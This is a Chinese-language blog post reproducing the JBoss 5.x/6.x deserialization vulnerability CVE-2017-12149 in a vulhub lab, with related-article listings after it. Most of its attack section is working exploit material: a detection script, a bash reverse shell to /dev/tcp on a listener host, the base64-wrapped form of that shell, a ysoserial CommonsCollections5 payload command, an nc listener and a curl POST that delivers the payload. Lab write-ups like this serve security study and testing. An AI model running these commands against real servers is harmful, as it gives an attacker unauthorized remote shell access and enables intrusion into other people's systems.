JBoss 5.x/6.x 反序列化漏洞复现

最新推荐文章于 2023-11-28 19:55:15 发布
最新推荐文章于 2023-11-28 19:55:15 发布
阅读量307 收藏
点赞数
分类专栏: 渗透测试 文章标签: JBoss JBoss反序列化 CVE--2017-12149 JBoss漏洞 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43571641/article/details/110489444
版权

0x01 漏洞简介

该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

影响版本:

  • JBoss 5.x
  • JBoss 6.x

0x02 漏洞环境

使用vulhub漏洞平台,执行下面命令启动漏洞环境:

cd /vulhub/jboss/CVE-2017-12149
sudo docker-compose up -d

首次执行时会有1~3分钟时间初始化,初始化完成后访问http://your-ip:8080/即可看到JBoss默认页面。

0x03 漏洞复现

1. 漏洞检测POC

该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化。

使用POC脚本进行漏洞检测

python cve-2017-12149_poc.py http://192.168.126.130:8080/

POC脚本源码如下:

##!/usr/bin/python
#-*- coding:utf-8 -*-
import requests
import sys

if len(sys.argv)!=2:
    print('+---------------------------------------------------------------+')
    print('+ DES: by zhzyker as https://github.com/zhzyker/exphub          +')
    print('+---------------------------------------------------------------+')
    print('+ USE: python <filename> <url>                                  +')
    print('+ EXP: python cve-2017-12149_poc.py http://freeerror.org:8080   +')
    print('+ VER: Jboss AS 5.X                                             +')
    print('+      Jboss AS 6.X                                             +')
    print('+---------------------------------------------------------------+')
    sys.exit()
url = sys.argv[1]

vulurl = url+"/invoker/readonly"

headers = {
'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0",
'Accept': "*/*",
'Content-Type': "application/json",
'X-Requested-With': "XMLHttpRequest",
'Connection': "close",
'Cache-Control': "no-cache"
}


try:
    r =requests.post(vulurl, headers=headers, verify=False)
    e=r.status_code
except:
    print ("[-] Target "+url+" Not CVE-2017-12149 Good Luck")
    sys.exit()
if e == 500:
    print ("[+] Target "+url+" Find CVE-2017-12149  EXP:https://github.com/zhzyker/exphub")
else: 
    print ("[-] Target "+url+" Not CVE-2017-12149 Good Luck")
    exit()
2. 编写反弹shell
# 1. 设置好要接收shell的主机ip和端口号:
bash -i >& /dev/tcp/192.168.126.128/7777 0>&1

# 2. 将第一步中的代码进行Base64加密:
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyNi4xMjgvNzc3NyAwPiYx

# 3. 将第二步中的代码添加到如下位置:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyNi4xMjgvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}

# 4. 使用ysoserial生成序列化数据,并重定向到exp.ser文件
java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyNi4xMjgvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}" > exp.ser


Tips1:ysoserical用法:java -jar ysoserial.jar [payload][command]”
Tips2:由于目标jdk版本过高,因此这里使用的利用库为CommonsCollections5(具体根据对方jdk版本选择)
Tips3:我们使用bash反弹shell,由于Runtime.getRuntime().exec()中不能使用重定向和管道符符号,这里需要对其进行Base64编码再使用
3. 获取目标shell

在接收shell的攻击主机上开启端口监听

nc -lvp 7777

通过二进制POST方式发送攻击载荷exp.ser/invoker/readonly

curl http://192.168.126.130:8080/invoker/readonly --data-binary @exp.ser

成功接收到反弹的shell:

Luckysec
关注
专栏目录
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149复现
薛定谔嘚喵博客
05-11 673
漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞
网安漏洞复现系列:漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)
最新发布
weixin_54626591的博客
05-06 236
漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)
JBoss JMXInvokerServlet 反序列化漏洞CVE-2015-7501)
黑白的博客
12-21 2050
声明 好好学习,天天向上 漏洞描述 这是经典的JBoss反序列化漏洞JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。 影响范围 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149复现
YouthBelief的博客
11-01 687
JBoss漏洞复现前言一、JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149)0x01 漏洞描述0x02 影响范围0x03 漏洞利用工具直接利用0x04 漏洞修复总结 前言 使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,我们需要用进行一次编码。 一、JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149) 0x01 漏洞描述 该漏洞为 Java反序列化错误类型,存在于 Jboss 的 Ht
JBoss 5.x/6.x 反序列化漏洞复现(CVE-2017-12149)
wutiangui的博客
09-11 427
① ysoserial是一款目前最流行的Java反序列化Payload生成工具,目前支持29种的Payload生成。所以我们使用 ysoserial 来复现生成序列化数据,并重定向到exp.ser文件。该漏洞存在于http invoker组件的ReadOnlyAccessFilter的doFilter中,在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化。执行完该命令之后,会在本地桌面生成一个序列化的文件exp.ser,并利用cat查看其内容。
中间件安全:JBoss 反序列化命令执行漏洞.(CVE-2017-12149
网络安全领域___专研者.
11-28 724
JBoss 反序列化漏洞,该漏洞位于 JBoss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中,其 doFilter 方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致恶意访问者通过精心设计的序列化数据执行任意代码。
JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)复现
KaNongDD的博客
09-18 1426
前言 写这篇文章是因为,现在CSDN环境太恶心人了,全是水文章或者收费文章。完全没几个是自己亲自去复现的。 准备工作(实在不懂了加我微信问我:14777115517,但还是希望你们先动手弄) 需要的工具链接: https://pan.baidu.com/s/1BmDo1vYX6DTZeI8wcnxFZQ 提取码:4bzf 该漏洞出现在/jbossmq-httpil/HTTPServerILServlet请求中,利用ysoserial的eCommonsCollections5利用链。 必看:.
CVE-2017-7504)JBoss 4.x JBossMQ JMS 反序列化漏洞
weixin_45253622的博客
12-09 744
JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504) vulhub官方复现:https://vulhub.org/#/environments/jboss/CVE-2017-7504/ 漏洞描述:Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ 实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java
JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)
yang1234567898的博客
04-22 1649
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 漏洞复现 启动环境 docker-compose up -d 该漏洞出现在/jbossmq-httpil/HTTPServerI.
渗透测试-JBoss 5.x/6.x反序列化漏洞
道阻且长,行则将至。
07-08 1764
漏洞概述 2017年8月30日,Redhat公司发布了一个JbossAS 5.x系统的远程代码执行严重漏洞通告,相应的漏洞编号为 CVE-2017-12149。近期有安全研究者发现JbossAS 6.x也受该漏洞影响,攻击者可能利用此漏洞无需用户验证在系统上执行任意命令。 类型 描述 漏洞名称 JBOSSAS5.x/6.x反序列化命令执行漏洞 威胁类型 远程命令执行 威胁等级 高 漏洞ID CVE-2017-12149 受影响系统及应用版本 Jboss AS 5.x、Jbos
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149
willow_liang的博客
10-24 253
漏洞原理: 漏洞复现 下载利用工具 javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java javac将java源文件编译为class字节码文件。-cp指明.java文件中import类的位置 java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "touch /tmp/success"
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149
zzzzz1284的博客
03-13 278
CVE-2017-12149
JBoss 5.x6.x 反序列化漏洞CVE-2017-12149
weixin_47311099的博客
12-08 262
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149) 该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。 环境启动 vulhub进入vulhub/jboss/CVE-2017-12149启动,需要等2分钟左右 docker-compose up -d 访问本机ip的8080端口 漏洞复现 使用工具检
JBoss5.x / 6.x反序列化漏洞CVE-2017-12149
Kevin's Blog
06-08 852
一、漏洞介绍 1.1 漏洞详情   该漏洞为Java反序列化错误类型,存在于JBoss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。该过滤器没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化。该漏洞在内网中比较常见。 1.2 影响版本 JBoss 5.x 和 6.x 二、环境搭建 受害者:192.168.159.129(vulhub) 攻击者:192.168.158.128(kali) 》》进入到如下目录启动环境 》》查看启动的端口 》》访问we
JBoss5.x6.x 反序列化漏洞
weixin_44110913的博客
11-05 309
JBOSS 下载地址:http://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.1.0.Final.zip EXP 下载地址:https://github.com/yunxu1/jboss-_CVE-2017-12149 2). 环境搭建 wget http://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.1.0.Final.zip 第二步:修改配置文件,使网络中的主机都
JBoss 5.x/6.x 反序列化漏洞复现CVE-2017-12149
yang1234567898的博客
04-22 1302
漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞漏洞复现 启动环境 该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化,采用其他反序列化利用链就可以了 使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用
JBoss反序列化
Massimo__JAVA的博客
07-15 554
jBoss是一个基于J2EE的开发源代码的应用服务器。JBoss代码遵循LGPL许可, 可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、 EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。
JBoss 4.x与J2EE 1.4实战:从安装到应用开发
接着,详细讲述了如何在Windows环境下安装和配置JBoss 4.x,包括Java 5的安装、Oracle Database 10g和MySQL 4.0.x 数据库的设置,以及将JBoss服务器安装为Windows服务的方法。 此外,文档还涉及了JBoss-IDE 1.4.0的...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Luckysec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值